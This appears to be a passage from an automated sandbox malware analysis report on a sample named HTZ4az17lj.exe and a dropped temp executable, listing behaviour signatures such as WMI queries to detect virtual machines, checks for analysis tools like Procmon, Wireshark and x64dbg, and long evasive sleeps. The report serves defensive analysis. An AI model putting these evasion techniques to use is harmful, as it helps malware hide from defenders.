Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\netsh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Source: C:\Users\user\Desktop\HTZ4az17lj.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\HTZ4az17lj.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\HTZ4az17lj.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\HTZ4az17lj.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\HTZ4az17lj.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\HTZ4az17lj.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: HTZ4az17lj.exe, 00000000.00000002.2116685622.0000029580001000.00000004.00000800.00020000.00000000.sdmp, uuhbr0xg.h20.exe, 0000000B.00000002.2097336335.0000025680001000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: PROCESSHACKER.EXE
Source: HTZ4az17lj.exe, 00000000.00000002.2116685622.0000029580001000.00000004.00000800.00020000.00000000.sdmp, uuhbr0xg.h20.exe, 0000000B.00000002.2097336335.0000025680001000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: PROCMON.EXE
Source: HTZ4az17lj.exe, 00000000.00000002.2116685622.0000029580001000.00000004.00000800.00020000.00000000.sdmp, uuhbr0xg.h20.exe, 0000000B.00000002.2097336335.0000025680001000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: HOOKEXPLORER.EXE
Source: HTZ4az17lj.exe, 00000000.00000002.2116685622.0000029580001000.00000004.00000800.00020000.00000000.sdmp, uuhbr0xg.h20.exe, 0000000B.00000002.2097336335.0000025680001000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AUTORUNSC.EXE
Source: HTZ4az17lj.exe, 00000000.00000002.2116685622.0000029580001000.00000004.00000800.00020000.00000000.sdmp, uuhbr0xg.h20.exe, 0000000B.00000002.2097336335.0000025680001000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OLLYDBG.EXE
Source: HTZ4az17lj.exe, 00000000.00000002.2116685622.0000029580001000.00000004.00000800.00020000.00000000.sdmp, uuhbr0xg.h20.exe, 0000000B.00000002.2097336335.0000025680001000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: X64DBG.EXE
Source: HTZ4az17lj.exe, 00000000.00000002.2116685622.0000029580001000.00000004.00000800.00020000.00000000.sdmp, uuhbr0xg.h20.exe, 0000000B.00000002.2097336335.0000025680001000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: REGMON.EXE
Source: HTZ4az17lj.exe, 00000000.00000002.2116685622.0000029580001000.00000004.00000800.00020000.00000000.sdmp, uuhbr0xg.h20.exe, 0000000B.00000002.2097336335.0000025680001000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
Source: HTZ4az17lj.exe, 00000000.00000002.2116685622.0000029580001000.00000004.00000800.00020000.00000000.sdmp, uuhbr0xg.h20.exe, 0000000B.00000002.2097336335.0000025680001000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AUTORUNS.EXE
Source: HTZ4az17lj.exe, 00000000.00000002.2116685622.0000029580001000.00000004.00000800.00020000.00000000.sdmp, uuhbr0xg.h20.exe, 0000000B.00000002.2097336335.0000025680001000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: FIDDLER.EXE2
Source: HTZ4az17lj.exe, 00000000.00000002.2116685622.0000029580001000.00000004.00000800.00020000.00000000.sdmp, uuhbr0xg.h20.exe, 0000000B.00000002.2097336335.0000025680001000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: PETOOLS.EXE
Source: HTZ4az17lj.exe, 00000000.00000002.2116685622.0000029580001000.00000004.00000800.00020000.00000000.sdmp, uuhbr0xg.h20.exe, 0000000B.00000002.2097336335.0000025680001000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: IDAQ.EXE
Source: HTZ4az17lj.exe, 00000000.00000002.2116685622.0000029580001000.00000004.00000800.00020000.00000000.sdmp, uuhbr0xg.h20.exe, 0000000B.00000002.2097336335.0000025680001000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: DUMPCAP.EXE
Source: HTZ4az17lj.exe, 00000000.00000002.2116685622.0000029580001000.00000004.00000800.00020000.00000000.sdmp, uuhbr0xg.h20.exe, 0000000B.00000002.2097336335.0000025680001000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: WIRESHARK.EXE
Source: HTZ4az17lj.exe, 00000000.00000002.2116685622.0000029580001000.00000004.00000800.00020000.00000000.sdmp, uuhbr0xg.h20.exe, 0000000B.00000002.2097336335.0000025680001000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: FILEMON.EXE
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Memory allocated: 295F4F80000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Memory allocated: 295F6A10000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe Memory allocated: 256F17A0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe Memory allocated: 256F32F0000 memory reserve | memory write watch Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Thread delayed: delay time: 599751 Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Thread delayed: delay time: 599619 Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Thread delayed: delay time: 599460 Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Thread delayed: delay time: 599356 Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Thread delayed: delay time: 599247 Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Thread delayed: delay time: 599128 Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Thread delayed: delay time: 598988 Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Thread delayed: delay time: 598874 Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Thread delayed: delay time: 598765 Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Thread delayed: delay time: 598655 Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Thread delayed: delay time: 598546 Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Thread delayed: delay time: 598435 Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Thread delayed: delay time: 598327 Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Thread delayed: delay time: 598215 Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Thread delayed: delay time: 598106 Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Thread delayed: delay time: 597997 Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Thread delayed: delay time: 597870 Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Thread delayed: delay time: 597746 Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Thread delayed: delay time: 597561 Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Thread delayed: delay time: 597449 Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Thread delayed: delay time: 597343 Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Thread delayed: delay time: 597233 Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Thread delayed: delay time: 597124 Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Thread delayed: delay time: 597008 Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Thread delayed: delay time: 596906 Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Thread delayed: delay time: 596768 Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Thread delayed: delay time: 596608 Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Thread delayed: delay time: 596436 Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Thread delayed: delay time: 596232 Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Thread delayed: delay time: 596124 Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Thread delayed: delay time: 596013 Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Thread delayed: delay time: 595905 Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Thread delayed: delay time: 595783 Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Thread delayed: delay time: 595654 Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Thread delayed: delay time: 595545 Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Thread delayed: delay time: 595433 Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Thread delayed: delay time: 595326 Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Thread delayed: delay time: 595217 Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Thread delayed: delay time: 595107 Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Thread delayed: delay time: 595001 Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Thread delayed: delay time: 594855 Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Thread delayed: delay time: 594745 Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Thread delayed: delay time: 594631 Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Thread delayed: delay time: 594508 Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Thread delayed: delay time: 594399 Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Thread delayed: delay time: 594280 Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Thread delayed: delay time: 594171 Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Thread delayed: delay time: 594060 Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Thread delayed: delay time: 593952 Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Thread delayed: delay time: 593843 Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Thread delayed: delay time: 593733 Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Thread delayed: delay time: 593624 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Window / User API: threadDelayed 4975 Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Window / User API: threadDelayed 4555 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\HTZ4az17lj.exe TID: 7436 Thread sleep time: -34126476536362649s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe TID: 7436 Thread sleep time: -600000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe TID: 7436 Thread sleep time: -599751s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe TID: 7436 Thread sleep time: -599619s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe TID: 7436 Thread sleep time: -599460s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe TID: 7436 Thread sleep time: -599356s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe TID: 7436 Thread sleep time: -599247s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe TID: 7436 Thread sleep time: -599128s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe TID: 7436 Thread sleep time: -598988s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe TID: 7436 Thread sleep time: -598874s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe TID: 7436 Thread sleep time: -598765s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe TID: 7436 Thread sleep time: -598655s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe TID: 7436 Thread sleep time: -598546s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe TID: 7436 Thread sleep time: -598435s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe TID: 7436 Thread sleep time: -598327s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe TID: 7436 Thread sleep time: -598215s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe TID: 7436 Thread sleep time: -598106s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe TID: 7436 Thread sleep time: -597997s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe TID: 7436 Thread sleep time: -597870s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe TID: 7436 Thread sleep time: -597746s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe TID: 7436 Thread sleep time: -597561s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe TID: 7436 Thread sleep time: -597449s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe TID: 7436 Thread sleep time: -597343s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe TID: 7436 Thread sleep time: -597233s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe TID: 7436 Thread sleep time: -597124s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe TID: 7436 Thread sleep time: -597008s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe TID: 7436 Thread sleep time: -596906s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe TID: 7436 Thread sleep time: -596768s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe TID: 7436 Thread sleep time: -596608s >= -30000s Jump to behavior
